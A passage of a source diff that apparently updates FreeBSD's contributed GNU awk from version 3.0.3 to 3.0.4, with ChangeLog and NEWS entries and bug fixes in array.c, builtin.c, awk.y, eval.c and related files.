GAWK_AC_SYS_LARGEFILE needs this. + (GAWK_AC_SYS_LARGEFILE): Renamed from GAWK_AC_LARGE_FILES. + + * aclocal.m4 (GAWK_AC_SYS_LARGEFILE): Renamed from GAWK_AC_LARGE_FILES. + Add support for AIX and HP-UX. + (GAWK_AC_SYS_LARGEFILE_FLAGS, GAWK_AC_SYS_LARGEFILE_SPACE_APPEND, + GAWK_AC_SYS_LARGEFILE_MACRO_VALUE): New macros. + + * acconfig.h (_FILE_OFFSET_BITS, _LARGEFILE_SOURCE, _LARGE_FILES): + New macros. + + * Makefile.in (MISC): add config.guess and config.sub so they get + included in the distribution. + +Wed Jun 9 11:29:29 1999 Paul Eggert + + * io.c (iop_alloc): Don't mmap files whose sizes don't fit in `int'. + [ This isn't really needed, as HAVE_MMAP is #undef'ed at the top, + but it's there in case people want to take their life in their hands. ] + +Sun Jun 6 11:28:07 1999 Arnold D. Robbins + + * BETA Release 3.0.46: Release tar file made. + +Wed Jun 2 14:36:24 1999 Arnold D. Robbins + + * PORTS: Updated with a more recent list of systems + that gawk compiles and tests ok on. + +Tue Jun 1 14:24:59 1999 Arnold D. Robbins + + * BETA Release 3.0.45: Release tar file made. + +Tue May 25 16:32:37 1999 Arnold D. Robbins + + * builtin.c (format_tree): more smarts for weird cases, such as + zero precisions and zero values used with the `#' flag. + Thanks to Andreas Schwab (schwab@gnu.org) for pointing these out. + +Wed May 19 14:02:54 1999 Arnold D. Robbins + + * io.c (do_close): move test for `close(FILENAME)' to after + loop through all open redirections. Fixes problems in obscure + cases with redirections in END rules. + +Sun May 16 14:08:39 1999 Arnold D. Robbins + + * awk.y (yylex): fix group of characters including ',' to + set want_assign = FALSE. Fixes bizarre parsing problems in + function call lists, for example. + * io.c (get_a_record): repair logic for single-leading-newline + case. + +Tue May 11 16:48:11 1999 Arnold D. Robbins + + * aclocal.m4 (GAWK_AC_AIX_TWEAK): new macro. + * configure.in: call it + * Makefile.in: (awklib/all): pass CFLAGS on to sub-make so + that password programs will get AIX magic defines. Avoids + having to tweak program code for those in doc/gawk.texi. + +Mon May 3 16:56:23 1999 Arnold D. Robbins + + * array.c (do_delete): don't free_temp(subs) until after all + references to it are finished. + +Mon May 3 13:41:16 1999 Arnold D. Robbins + + * BETA Release 3.0.44: Release tar file made. + +Sun May 2 18:25:43 1999 Arnold D. Robbins + + * io.c (get_a_record): Do a really good job of stripping newlines + from the front of records when RS = "" and there's only one + newline at the front of the file, which the regex didn't catch. + +Wed Apr 28 12:27:49 1999 Arnold D. Robbins + + * configure.in: more HP stuff: fix the manual alloca code so that + gawk will compile and link on HP systems. See the comments. + +Sun Apr 25 13:39:16 1999 Arnold D. Robbins + + * Makefile.in (gawk): add $(CFLAGS) to linking step. + * configure.in: correctly do AC_FUNC_GETPRGP on HP systems too. + +Tue Apr 13 20:21:00 1999 Arnold D. Robbins + + * BETA Release 3.0.43: Release tar file made. + +Tue Apr 13 19:02:20 1999 Arnold D. Robbins + + * io.c (useropen, pidopen): add casts to int on arguments to + silence gcc warnings. + * regex.c (regcomp,regexec,regfree): add ifdef for APPLE. + +Thu Feb 4 10:38:02 1999 Arnold D. Robbins + + * custom.h: hacks for BeOS. Not documented in the manual right now. + * configure.in: hacks for BeOS. Check for HP-UX and define C_ALLOCA + if not using gcc. I wish they'd just fix bison already. + +Sun Dec 20 16:57:38 1998 Arnold D. Robbins + + * BETA Release 3.0.42: Release tar file made. + +Sun Nov 15 21:05:39 1998 Arnold D. Robbins + + * io.c (gawk_popen): Add WIN32 to list of systems that use + the non-real-pipe version. From the PC gawk guys. + +Wed Nov 4 11:32:24 1998 Arnold D. Robbins + + * BETA Release 3.0.41: Release tar file made. + +Tue Nov 3 16:24:35 1998 Arnold D. Robbins + + * eval.c (r_get_lhs): Fix the cases for the special variables, + don't unref their current value if it's the same as the internal + copy; perhaps the current one is used in a concatenation or some + other expression somewhere higher up in the call chain. Ouch. + See test/getnr2tm.awk. + +Sun Nov 1 15:24:52 1998 Arnold D. Robbins + + * builtin.c (format_tree): improve handling of zero-fill + when a precision is present. See test/zeroflag.awk. + +Wed Oct 28 20:40:17 1998 Arnold D. Robbins + + * eval.c (r_tree_eval): Case for Node_concat. Get lengthes + separately, in case one expression has a side effect that + that changes another. Ugly, but it keeps gawk from core + dumping. See test/nasty.awk. + +Sun Oct 18 21:27:24 1998 Arnold D. Robbins + + * awk.y (append_right): bug fix, if `list' or `new' are NULL, + return `list', so that things don't break too badly. + * regex.c (re_compile_fastmap): remove unused variable `num_regs'. + +Thu Oct 8 19:36:57 1998 Arnold D. Robbins + + * BETA Release 3.0.40: Release tar file made. + +Mon Jul 27 10:14:33 1998 Arnold D. Robbins + + * node.c (parse_escape): Remove assignment with side effects + from ISXDIGIT test. Thanks to "Mihai T. LAZARESCU" + for pointing this out. + +Mon Apr 27 11:31:32 1998 Arnold D. Robbins + + * main.c (usage): fix the email address for the bug list. + (copyleft): update the copyright year. + +Mon Mar 23 21:22:32 1998 Arnold D. Robbins + + * eval.c (r_get_lhs): make sure that values of type + Node_param_list don't have the FUNC flag set. This means + we don't allow the use of a function name as a variable or + array from within the function. + +Sun Mar 22 19:12:32 1998 Paul Eggert + + * aclocal.m4 (GAWK_AC_LARGE_FILES): new macro that checks for + large file support, and updates CPPFLAGS, LDFLAGS, LIBS as + needed. + * configure.in: call GAWK_AC_LARGE_FILES. + * Makefile.in (CPPFLAGS, LDFLAGS): Let autoconf configure. + (COMPFLAGS): Add $(CPPFLAGS). + +Mon Mar 16 14:06:41 1998 Arnold D. Robbins + + * field.c (using_FIELDWIDTHS): new macro. + (using_fieldwidths): use new macro. + (do_split): in case for FS_DFLT, also check that + we're not using FIELDWIDTHS. Otherwise, split() would use + FIELDWIDTHS, not current value of FS. Oops. + +Sun Nov 16 20:08:59 1997 Arnold D. Robbins + + * builtin.c (sub_common): fix for count of matches in gsub + from Geert.Debyser@esat.kuleuven.ac.be. + +Wed Oct 15 03:38:12 1997 Arnold D. Robbins + + * field.c (set_FS): Use `sc_parsefield' if the value of FS is not + alphabetic OR if not ignoring case. Bug fix if IGNORECASE + is true and FS happens to be '^'. Sheesh, talk about obscure. + (rebuild_record): Add more smarts to the code that sets up the + fields. Thanks to Alan J. Broder (ajb@dtmr.com). + +Sun Oct 5 11:56:52 1997 Arnold D. Robbins + + * configure.in: if ISC add -D_SYSV3 to CFLAGS, per email from + Mario Vanoni (vanonim@dial.eunet.ch). + +Fri Sep 26 00:57:49 1997 Arnold D. Robbins + + * awk.y (append_right): return if either list is NULL. Prevents + syntax errors from causing core dumps. + +Wed Sep 17 15:34:15 1997 Arnold D. Robbins + + * field.c (rebuild_record): set things up so that all fields point + into the new record and release any changed fields without + causing memory leaks. Avoids problems when fields are extended + with the value of $0 or other fields and then $0 is assigned to. + +Mon Sep 15 16:12:55 1997 Arnold D. Robbins + + * builtin.c (do_print): when testing for NUMBER, make sure + it's not a string too. Thanks to Michael Brennan for + clarifying the semantics. + +Sun Sep 14 19:55:12 1997 Arnold D. Robbins + + * node.c (format_val): always format values ourselves: avoids + problems if OFMT is bizarre, like %s. + +Sun Sep 14 00:08:53 1997 Arnold D. Robbins + + * io.c (get_a_record): replace all occurrences of the test + `grRS == FALSE' with `RS_is_null' which makes ` RS = "\0" ' + actually work, is clearer code, and actually makes use of + the `RS_is_null' variable! + +Sun Aug 17 07:15:12 1997 Arnold D. Robbins + + * field.c (set_FS): Change logic to always set parse_field, even + if FS hasn't changed. Thanks to Igor Sheyn for catching this. + +Wed Aug 6 21:04:37 1997 Arnold D. Robbins + + * io.c (VMS et al gawk_popen): use pclose, not fclose, if + iop_alloc fails. + +Wed Jul 30 19:53:52 1997 Arnold D. Robbins + + * awk.y [variable]: fix case for subscript if $3 == NULL. + +Sun Jul 27 22:47:30 1997 Arnold D. Robbins + + * awk.y (get_src_buf): don't close file if it's stdin. + +Sun Jul 27 22:47:15 1997 Pat Rankin + + * io.c (#if VMS: vmsrtl_fileno): new routine. + (#if VMS: fileno): new macro substituted for stdio one. + +Thu Jul 17 20:05:59 1997 Arnold D. Robbins + + * builtin.c (do_print): When OFMT != CONVFMT, create a new + temporary node with just the numeric value valid and format it, + and use that for printing. Avoids memory corruption. + +Wed Jul 16 10:01:16 1997 Arnold D. Robbins + + * regex.c: When SYNTAX_TABLE is defined, but not emacs, then + CHAR_SET_SIZE is not defined, though used in regcomp. It should + be taken out of #ifdef SYNTAX_TABLE. Fix from bug group, from + Akim Demaille, demaille@inf.enst.fr. + * awk.h (isnondecimal): make test a little smarter. + builtin.c (nondec2awknum): add bailout for decimal numbers, e.g. + `00.1'. Fix from Larry Schwimmer . + +Thu Jun 19 19:00:40 1997 Arnold D. Robbins + + * eval.c (interpret): case Node_K_next, Node_K_nextfile: fatal + error if called from BEGIN or END. + (Fixed completely Mon May 3 13:31:42 1999.) + +Mon Jun 9 22:40:04 1997 Arnold D. Robbins + + * builtin.c (nondec2awknum): Allow `f' and `F' in hexadecimal numbers. + Gotta get more sleep... + * array.c (assoc_lookup): Fix from Tom Karzes (karzes@equator.com) + for memory leak when forcing type to Node_var_array. + Thu May 15 12:49:08 1997 Arnold D. Robbins * Release 3.0.3: Release tar file made. Index: FREEBSD-upgrade =================================================================== RCS file: /home/ncvs/src/contrib/awk/FREEBSD-upgrade,v retrieving revision 1.5 diff -u -d -r1.5 FREEBSD-upgrade --- FREEBSD-upgrade 1998/03/10 19:25:14 1.5 +++ FREEBSD-upgrade 1999/09/08 16:34:38 @@ -23,6 +23,8 @@ atari/ awklib/ awktab.c +config.guess +config.sub configh.in configure configure.in @@ -33,6 +35,7 @@ doc/awkforai.txt doc/cardfonts doc/colors +doc/awk.texi doc/igawk.1 doc/macros doc/no.colors Index: FUTURES =================================================================== RCS file: /home/ncvs/src/contrib/awk/FUTURES,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 FUTURES --- FUTURES 1997/10/14 18:16:56 1.1.1.1 +++ FUTURES 1999/09/08 16:32:51 @@ -73,8 +73,6 @@ Use GNU malloc. - Use rx instead of regex. - DONE: Do a reference card. ? Have strftime() pay attention to the value of ENVIRON["TZ"] Index: NEWS =================================================================== RCS file: /home/ncvs/src/contrib/awk/NEWS,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 NEWS --- NEWS 1997/10/14 18:16:54 1.1.1.1 +++ NEWS 1999/09/08 16:32:51 @@ -1,3 +1,79 @@ +Changes from 3.0.3 to 3.0.4 +--------------------------- + +This is a bug fix release only, pending further development on 3.1.0. + +Bugs Fixed: + + 1. A memory leak when turning a function parameter into an array was + fixed. + + 2. The non-decimal data option now works correctly. + + 3. Using an empty pair of brackets as an array subscript no longer causes + a core dump during parsing. In general, syntax errors should not + cause core dumps any more. + + 4. Standard input is no longer closed if it provides program source, + avoiding strange I/O problems. + + 5. Memory corruption during printing with `print' has been fixed. + + 6. The gsub function now correctly counts the number of matches. + + 7. A typo in doc/Makefile.in has been fixed, making installation work. + + 8. Calling `next' or `nextfile' from a BEGIN or END rule is now fatal. + + 9. Subtle problems in rebuilding $0 when fields were changed have been + fixed. + +10. `FS = FS' now correctly turns off the use of FIELDWIDTHS. + +11. Gawk now parses fields correctly when FS is a single character. + +12. It is now possible for RS to be the NUL character ("\0"). + +13. Weird problems with number conversions on MIPS and other systems + have been fixed. + +14. When parsing using FIELDWIDTHS is in effect, split() with no third + argument will still use the value of FS. + +15. Large File Support for Solaris, HP-UX, AIX, and IRIX is now enabled at + compile time, thanks to Paul Eggert. + +16. Attempting to use the name of a function as a variable or array + from within the function is now caught as a fatal error, instead + of as a core dump. + +17. A bug in parsing hex escapes was fixed. + +18. A weird bug with concatenation where one expression has side effects + that changes another was fixed. + +19. printf/sprintf now behave much better for uses of the '0' and '#' flags + and with precisions and field widths. + +20. Further strangenesses with concatenation and multiple accesses of some + of the special variables was fixed. + +21. The Atari port is marked as no longer supported. + +22. Build problems on HP-UX have been fixed. + +23. Minor fixes and additional explanations added to the documentation. + +24. For RS = "", even a single leading newline is now correctly stripped. + +25. Obscure parsing problems for regex constants like /=.../ fixed, so + that a regex constant is recognized, and not the /= operator. + +26. Fixed a bug when closing a redirection that matched the current + or last FILENAME. + +27. Build problems on AIX fixed. + Changes from 3.0.2 to 3.0.3 --------------------------- Index: PORTS =================================================================== RCS file: /home/ncvs/src/contrib/awk/PORTS,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 PORTS --- PORTS 1997/10/14 18:16:54 1.1.1.1 +++ PORTS 1999/09/08 16:32:51 @@ -1,36 +1,27 @@ -A recent version of gawk has been successfully compiled and run "make test" +Gawk 3.0.4 has been successfully compiled and run "make test" on the following: -Using cc: - Dec Alpha OSF 4.0 - HP9000/755 HP-UX 9.01 - IBM PowerPC AIX 4.1.4.0 - SCO Unix (OpenServer 5) - SGI IRIX 4.0.5 - SGI IRIX 5.3 - SGI IRIX 6.1 - SGI IRIX 6.2 - SunOS 4.1.3 - SunOS 5.5 - IBM SP2 AIX 4.1 +Linux 2.2.5 gcc 2.7.2.3 +Linux 2.0.33 gcc 2.7.2.1 +IRIX64 6.4 gcc 2.8.1 +IRIX 5.3 gcc 2.7.2.2 +UNIX_SV maxion OS 4.2MP gcc 2.7.2 +IRIX 6.2 gcc 2.7.2.2 +CYGWIN_95-4.0 20.1 (0.3/1/1) egcs-2.91.66 (has minor problems due to env.) -Other systems: - DEC Alpha Linux/AXP - DEC Alpha OSF/1 3.2 - DECstation 5000 ULTRIX 4.3 - HP 9000/735 HP-UX 10.01 - IBM RS/6000 AIX 3.2 - IBM SP2 AIX 4.1 - Intel x86 DOS (compiler: djgpp v2, emx+gcc, - and MSC 6.00A, 7, and 8) - Intel x86 Linux 2.0.27 - Intel x86 Linux 2.1.36 - Intel x86 OS+2 (compiler: emx+gcc) - NeXT Turbostation Mach 3.3 - SGI Indigo/2 IRIX 5.3 - SGI O2 IRIX 6.2 - SGI PowerChallenge IRIX 6.1 - Sun SPARC Linux 2.0.22 - Sun SPARC Solaris 2.5 - Sun SPARC Solaris 2.5.1 - Sun SPARC SunOS 4.1.3 +The builds of gawk-3.0.45, and validation and installation, were +successful on these systems: + + DEC Alpha OSF/1 3.2 + HP 9000/735 HP-UX 10.01 + IBM PowerPC AIX 4.2 + Intel Pentium II MMX GNU/Linux 2.0.35 + NeXT Turbostation Mach 3.3 + SGI Indigo/2 IRIX 5.3 + SGI O2 R10000-SC IRIX 6.3 + Sun SPARC Solaris 2.6 + +On + SGI Origin 200 IRIX 6.4 +a build with gcc-2.8.1 succeeded, but several tests failed; a rebuild +with c89 fixed the problem. Index: POSIX.STD =================================================================== RCS file: /home/ncvs/src/contrib/awk/POSIX.STD,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 POSIX.STD --- POSIX.STD 1997/10/14 18:16:54 1.1.1.1 +++ POSIX.STD 1999/09/08 16:32:51 @@ -1,3 +1,8 @@ +October 1998: + +The 1003.2 work has been at a stand-still for ages. Who knows if or +when a new revision will actually happen... + August 1995: Although the published 1003.2 standard contained the incorrect Index: README =================================================================== RCS file: /home/ncvs/src/contrib/awk/README,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 README --- README 1997/10/14 18:17:01 1.1.1.1 +++ README 1999/09/08 16:32:51 @@ -1,10 +1,10 @@ README: -This is GNU Awk 3.0.3. It should be upwardly compatible with the Bell +This is GNU Awk 3.0.4. It should be upwardly compatible with the Bell Labs research version of awk. It is almost completely compliant with the 1993 POSIX 1003.2 standard for awk. (See the note below about POSIX.) -Patches 1 through 3 just fix bugs -- see NEWS and ChangeLog for details. +Patches 1 through 4 just fix bugs -- see NEWS and ChangeLog for details. See the file INSTALL for installation instructions. @@ -66,7 +66,7 @@ outlined in the manual. Arnold Robbins -INTERNET: arnold@gnu.ai.mit.edu +INTERNET: arnold@gnu.org BUG REPORTS AND FIXES (non-Unix ports): @@ -81,7 +81,7 @@ Pat Rankin rankin@eql.caltech.edu -Atari ST: +Alpha/Linux: Michal Jaegermann michal@gortel.phys.ualberta.ca Index: acconfig.h =================================================================== RCS file: /home/ncvs/src/contrib/awk/acconfig.h,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 acconfig.h --- acconfig.h 1997/10/14 18:17:01 1.1.1.1 +++ acconfig.h 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1995-1997 the Free Software Foundation, Inc. + * Copyright (C) 1995-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -30,6 +30,9 @@ #undef SPRINTF_RET /* return type of sprintf */ #undef BITOPS /* bitwise ops (undocumented feature) */ #undef NONDECDATA /* non-decimal input data (undocumented feature) */ +#undef _FILE_OFFSET_BITS /* bits in a file offset, where this matters */ +#undef _LARGEFILE_SOURCE /* makes fseeko etc. visible on some hosts */ +#undef _LARGE_FILES /* emables large files on AIX-style hosts */ @BOTTOM@ Index: array.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/array.c,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 array.c --- array.c 1997/10/14 18:17:01 1.1.1.1 +++ array.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991 - 97 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -272,7 +272,10 @@ fatal("attempt to use scalar as array"); if (symbol->var_array == NULL) { - symbol->type = Node_var_array; + if (symbol->type != Node_var_array) { + unref(symbol->var_value); + symbol->type = Node_var_array; + } symbol->array_size = symbol->table_size = 0; /* sanity */ symbol->flags &= ~ARRAYMAXED; grow_table(symbol); @@ -360,13 +363,14 @@ last = bucket, bucket = bucket->ahnext) if (cmp_nodes(bucket->ahname, subs) == 0) break; - free_temp(subs); if (bucket == NULL) { if (do_lint) warning("delete: index `%s' not in array `%s'", subs->stptr, symbol->vname); + free_temp(subs); return; } + free_temp(subs); if (last != NULL) last->ahnext = bucket->ahnext; else Index: awk.h =================================================================== RCS file: /home/ncvs/src/contrib/awk/awk.h,v retrieving revision 1.4 diff -u -d -r1.4 awk.h --- awk.h 1997/10/26 12:14:52 1.4 +++ awk.h 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -25,6 +25,14 @@ /* ------------------------------ Includes ------------------------------ */ +/* + * config.h absolutely, positively, *M*U*S*T* be included before + * any system headers. Otherwise, extreme death, destruction + * and loss of life results. + * + * Well, OK, gawk just won't work on systems using egcs and LFS. But + * that's almost as bad. + */ #ifdef HAVE_CONFIG_H #include #endif @@ -34,6 +42,7 @@ #endif /* _GNU_SOURCE */ #include +#include #ifdef HAVE_LIMITS_H #include #endif /* HAVE_LIMITS_H */ @@ -588,7 +597,8 @@ /* ------------------------- Pseudo-functions ------------------------- */ #define is_identchar(c) (isalnum(c) || (c) == '_') -#define isnondecimal(str) (((str)[0]) == '0') +#define isnondecimal(str) (((str)[0]) == '0' && (ISDIGIT((str)[1]) \ + || (str)[1] == 'x' || (str)[1] == 'X')) #ifdef MPROF #define getnode(n) emalloc(n, NODE *, sizeof(NODE), "getnode") Index: awk.y =================================================================== RCS file: /home/ncvs/src/contrib/awk/awk.y,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 awk.y --- awk.y 1997/10/14 18:16:58 1.1.1.1 +++ awk.y 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -830,7 +830,9 @@ { $$ = variable($1, CAN_FREE, Node_var); } | NAME '[' expression_list ']' { - if ($3->rnode == NULL) { + if ($3 == NULL) { + fatal("invalid subscript expression"); + } else if ($3->rnode == NULL) { $$ = node(variable($1, CAN_FREE, Node_var_array), Node_subscript, $3->lnode); freenode($3); } else @@ -1169,7 +1171,8 @@ warning("source file `%s' is empty", source); } } - close(fd); + if (fileno(stdin) != fd) /* safety */ + close(fd); samefile = FALSE; nextfile++; if (lexeme) @@ -1451,14 +1454,17 @@ case ':': case '?': allow_newline(); - /* fall through */ + return lasttok = c; + case ')': case ']': case '(': - case '[': case ';': case '{': case ',': + want_assign = FALSE; + /* fall through */ + case '[': return lasttok = c; case '*': @@ -2108,6 +2114,9 @@ { register NODE *oldlist; static NODE *savefront = NULL, *savetail = NULL; + + if (list == NULL || new == NULL) + return list; oldlist = list; if (savefront == oldlist) { Index: builtin.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/builtin.c,v retrieving revision 1.5 diff -u -d -r1.5 builtin.c --- builtin.c 1997/10/26 12:14:52 1.5 +++ builtin.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -25,7 +25,6 @@ #include "awk.h" -#include #undef HUGE #undef CHARBITS #undef INTBITS @@ -410,6 +409,7 @@ double tmpval; char signchar = FALSE; size_t len; + int zero_flag = FALSE; static char sp[] = " "; static char zero_string[] = "0"; static char lchbuf[] = "0123456789abcdef"; @@ -437,6 +437,7 @@ prec = 0; have_prec = FALSE; signchar = FALSE; + zero_flag = FALSE; lj = alt = big = bigbig = small = FALSE; fill = sp; cp = cend; @@ -460,10 +461,9 @@ break; case '0': + zero_flag = TRUE; if (lj) goto retry; - if (cur == &fw) - fill = zero_string; /* FALL through */ case '1': case '2': @@ -587,6 +587,8 @@ goto retry; case 'c': need_format = FALSE; + if (zero_flag && ! lj) + fill = zero_string; parse_next_arg(); /* user input that looks numeric is numeric */ if ((arg->flags & (MAYBE_NUM|NUMBER)) == MAYBE_NUM) @@ -611,6 +613,8 @@ goto pr_tail; case 's': need_format = FALSE; + if (zero_flag && ! lj) + fill = zero_string; parse_next_arg(); arg = force_string(arg); if (! have_prec || prec > arg->stlen) @@ -622,6 +626,14 @@ need_format = FALSE; parse_next_arg(); tmpval = force_number(arg); + + /* + * ``The result of converting a zero value with a + * precision of zero is no characters.'' + */ + if (have_prec && prec == 0 && tmpval == 0) + goto pr_tail; + if (tmpval < 0) { if (tmpval < LONG_MIN) goto out_of_range; @@ -639,17 +651,28 @@ *--cp = (char) ('0' + uval % 10); uval /= 10; } while (uval > 0); + + /* add more output digits to match the precision */ + if (have_prec) { + while (cend - cp < prec) + *--cp = '0'; + } + if (sgn) *--cp = '-'; else if (signchar) *--cp = signchar; /* - * precision overrides '0' flags. however, for - * integer formats, precsion is minimum number of - * *digits*, not characters, thus we want to fill - * with zeroes. + * When to fill with zeroes is of course not simple. + * First: No zero fill if left-justifying. + * Next: There seem to be two cases: + * A '0' without a precision, e.g. %06d + * A precision with no field width, e.g. %.10d + * Any other case, we don't want to fill with zeroes. */ - if (have_prec) + if (! lj + && ((zero_flag && ! have_prec) + || (fw == 0 && have_prec))) fill = zero_string; if (prec > fw) fw = prec; @@ -673,6 +696,22 @@ need_format = FALSE; parse_next_arg(); tmpval = force_number(arg); + + /* + * ``The result of converting a zero value with a + * precision of zero is no characters.'' + * + * If I remember the ANSI C standard, though, + * it says that for octal conversions + * the precision is artificially increased + * to add an extra 0 if # is supplied. + * Indeed, in C, + * printf("%#.0o\n", 0); + * prints a single 0. + */ + if (! alt && have_prec && prec == 0 && tmpval == 0) + goto pr_tail; + if (tmpval < 0) { if (tmpval < LONG_MIN) goto out_of_range; @@ -685,18 +724,29 @@ uval = (unsigned long) tmpval; } /* - * precision overrides '0' flags. however, for - * integer formats, precsion is minimum number of - * *digits*, not characters, thus we want to fill - * with zeroes. + * When to fill with zeroes is of course not simple. + * First: No zero fill if left-justifying. + * Next: There seem to be two cases: + * A '0' without a precision, e.g. %06d + * A precision with no field width, e.g. %.10d + * Any other case, we don't want to fill with zeroes. */ - if (have_prec) + if (! lj + && ((zero_flag && ! have_prec) + || (fw == 0 && have_prec))) fill = zero_string; do { *--cp = chbuf[uval % base]; uval /= base; } while (uval > 0); - if (alt) { + + /* add more output digits to match the precision */ + if (have_prec) { + while (cend - cp < prec) + *--cp = '0'; + } + + if (alt && tmpval != 0) { if (base == 16) { *--cp = cs1; *--cp = '0'; @@ -755,7 +805,7 @@ *cp++ = signchar; if (alt) *cp++ = '#'; - if (fill != sp) + if (zero_flag) *cp++ = '0'; cp = strcpy(cp, "*.*") + 3; *cp++ = cs1; @@ -1084,6 +1134,7 @@ register FILE *fp; int numnodes, i; NODE *save; + NODE *tval; if (tree->rnode) { int errflg; /* not used, sigh */ @@ -1117,25 +1168,29 @@ t[i] = dupnode(n); free_temp(n); - if (t[i]->flags & NUMBER) { + if ((t[i]->flags & (NUMBER|STRING)) == NUMBER) { if (OFMTidx == CONVFMTidx) (void) force_string(t[i]); - else - t[i] = format_val(OFMT, OFMTidx, t[i]); + else { + tval = tmp_number(t[i]->numbr); + unref(t[i]); + t[i] = format_val(OFMT, OFMTidx, tval); + } } } for (i = 0; i < numnodes; i++) { efwrite(t[i]->stptr, sizeof(char), t[i]->stlen, fp, "print", rp, FALSE); unref(t[i]); - if (i != numnodes - 1) { - if (OFSlen > 0) - efwrite(OFS, sizeof(char), (size_t) OFSlen, - fp, "print", rp, FALSE); - } + + if (i != numnodes - 1 && OFSlen > 0) + efwrite(OFS, sizeof(char), (size_t) OFSlen, + fp, "print", rp, FALSE); + } if (ORSlen > 0) efwrite(ORS, sizeof(char), (size_t) ORSlen, fp, "print", rp, TRUE); + free(t); } @@ -1512,6 +1567,7 @@ */ if (lastmatchnonzero && matchstart == matchend) { lastmatchnonzero = FALSE; + matches--; goto empty; } /* @@ -2022,6 +2078,7 @@ case 'c': case 'd': case 'e': + case 'f': val = *str - 'a' + 10; break; case 'A': @@ -2029,6 +2086,7 @@ case 'C': case 'D': case 'E': + case 'F': val = *str - 'A' + 10; break; default: @@ -2039,11 +2097,12 @@ } else if (*str == '0') { for (; len > 0; len--) { if (! isdigit(*str) || *str == '8' || *str == '9') - goto done; + goto decimal; retval = (retval * 8) + (*str - '0'); str++; } } else { +decimal: save = str[len]; retval = atof(str); str[len] = save; Index: custom.h =================================================================== RCS file: /home/ncvs/src/contrib/awk/custom.h,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 custom.h --- custom.h 1997/10/14 18:16:57 1.1.1.1 +++ custom.h 1999/09/08 16:32:51 @@ -7,11 +7,11 @@ * information. * * If you make additions to this file for your system, please send me - * the information, to arnold@gnu.ai.mit.edu. + * the information, to arnold@gnu.org. */ /* - * Copyright (C) 1995-1997 the Free Software Foundation, Inc. + * Copyright (C) 1995-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -56,4 +56,11 @@ /* For sequent, based on email with Aron Griffis */ #ifdef _SEQUENT_ #undef HAVE_MMAP +#endif + +/* For BeOS, from mc@whoever.com */ +#if defined(__dest_os) && __dest_os == __be_os +#define BROKEN_STRNCASECMP +#define ELIDE_CODE +#include #endif Index: eval.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/eval.c,v retrieving revision 1.3 diff -u -d -r1.3 eval.c --- eval.c 1997/10/26 12:14:53 1.3 +++ eval.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -25,8 +25,6 @@ #include "awk.h" -#include - extern double pow P((double x, double y)); extern double modf P((double x, double *yp)); extern double fmod P((double x, double y)); @@ -566,14 +564,26 @@ break; case Node_K_next: + if (in_begin_rule) + fatal("`next' cannot be called from a BEGIN rule"); + else if (in_end_rule) + fatal("`next' cannot be called from an END rule"); + if (in_function()) pop_fcall_stack(); + longjmp(rule_tag, TAG_CONTINUE); break; case Node_K_nextfile: + if (in_begin_rule) + fatal("`nextfile' cannot be called from a BEGIN rule"); + else if (in_end_rule) + fatal("`nextfile' cannot be called from an END rule"); + if (in_function()) pop_fcall_stack(); + do_nextfile(); break; @@ -759,7 +769,8 @@ register size_t len; char *str; register char *dest; - int count; + int alloc_count, str_count; + int i; /* * This is an efficiency hack for multiple adjacent string @@ -773,16 +784,16 @@ /* * But first, no arbitrary limits. Count the number of * nodes and malloc the treelist and strlist arrays. - * There will be count + 1 items to concatenate. We + * There will be alloc_count + 1 items to concatenate. We * also leave room for an extra pointer at the end to - * use as a sentinel. Thus, start count at 2. + * use as a sentinel. Thus, start alloc_count at 2. */ save_tree = tree; - for (count = 2; tree && tree->type == Node_concat; tree = tree->lnode) - count++; + for (alloc_count = 2; tree && tree->type == Node_concat; tree = tree->lnode) + alloc_count++; tree = save_tree; - emalloc(treelist, NODE **, sizeof(NODE *) * count, "tree_eval"); - emalloc(strlist, NODE **, sizeof(NODE *) * count, "tree_eval"); + emalloc(treelist, NODE **, sizeof(NODE *) * alloc_count, "tree_eval"); + emalloc(strlist, NODE **, sizeof(NODE *) * alloc_count, "tree_eval"); /* Now, here we go. */ treep = treelist; @@ -795,15 +806,26 @@ * Now, evaluate to strings in LIFO order, accumulating * the string length, so we can do a single malloc at the * end. + * + * Evaluate the expressions first, then get their + * 